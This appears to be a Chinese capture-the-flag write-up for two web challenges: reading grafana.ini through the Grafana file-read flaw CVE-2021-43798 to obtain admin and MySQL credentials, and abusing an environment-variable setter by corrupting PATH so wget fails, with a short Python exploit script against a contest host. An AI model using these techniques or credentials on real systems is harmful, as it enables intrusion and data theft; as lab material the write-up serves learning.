oh-my-grafana

在这里插入图片描述

Grafana是一款用Go语言开发的开源数据可视化工具，可以做数据监控和数据统计，带有告警功能。
本题使用的Grafana版本为8.2.6，存在任意文件读取的漏洞（CVE-2021-43798）

由于本题需要登录，首先考虑能不能读取到grafana.ini，获取用户名和密码
在这里插入图片描述
在ini文件中搜索得到admin的用户名和密码，成功登录

[security]
# disable creation of admin user on first start of grafana
;disable_initial_admin_creation = false

# default admin user, created on startup
admin_user = admin

# default admin password, can be changed before first start of grafana,  or in profile settings
admin_password = 5f989714e132c9b04d4807dafeb10ade

# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm

在ini文件中还可以找到使用的数据库为mysql，用户名密码都为grafana

# Either "mysql", "postgres" or "sqlite3", it's your choice
;type = mysql
;host = mysql:3306
;name = grafana
;user = grafana
# If the password contains # or ; you have to wrap it with triple quotes. Ex """#password;"""
;password = grafana

连接mysql
在这里插入图片描述
flag就在数据库中

oh-my-lotto

在这里插入图片描述
首先是md5截断比较，用脚本跑出结果拿到端口号

打开附件进行源码审计

elif request.method == 'POST':
    flag = os.getenv('flag')
    lotto_key = request.form.get('lotto_key') or ''
    lotto_value = request.form.get('lotto_value') or ''
    try:
        lotto_key = lotto_key.upper()
        except Exception as e:
        print(e)
        message = 'Lotto Error!'
        return render_template('lotto.html', message=message)
    
    if safe_check(lotto_key):
        os.environ[lotto_key] = lotto_value
        try:
            os.system('wget --content-disposition -N lotto')
    
            if os.path.exists("/app/lotto_result.txt"):
                lotto_result = open("/app/lotto_result.txt", 'rb').read()
            else:
                lotto_result = 'result'
            if os.path.exists("/app/guess/forecast.txt"):
                forecast = open("/app/guess/forecast.txt", 'rb').read()
            else:
                forecast = 'forecast'
    
            if forecast == lotto_result:
                return flag
            else:
                message = 'Sorry forecast failed, maybe lucky next time!'
                return render_template('lotto.html', message=message)
        except Exception as e:
            message = 'Lotto Error!'
            return render_template('lotto.html', message=message)
    
    else:
        message = 'NO NO NO, JUST LOTTO!'
        return render_template('lotto.html', message=message)

源码中提供一种方式通过lotto_key和lotto_value来修改环境变量的值，可以修改PATH为一个无效值，从而使wget报错，导致上一次的lotto_result不会改变，然后直接复制上一次的lotto结果传入即可

import requests
url = "http://121.36.217.177:53001/"

def lotto(key,value):
    data = {"lotto_key": key,
            "lotto_value": value}
    txt=requests.post(url + "lotto",data=data).text
    print(txt)

def getResult():
    txt=requests.get(url+"result").text
    p=txt.split("<p>")[-1].split("</p>")[0]
    return p

lotto("","")
result= {"file":getResult()}
requests.post(url + "forecast",files=result)
lotto("PATH","xxxx")
#*ctf{its_forecast_0R_GUNICORN}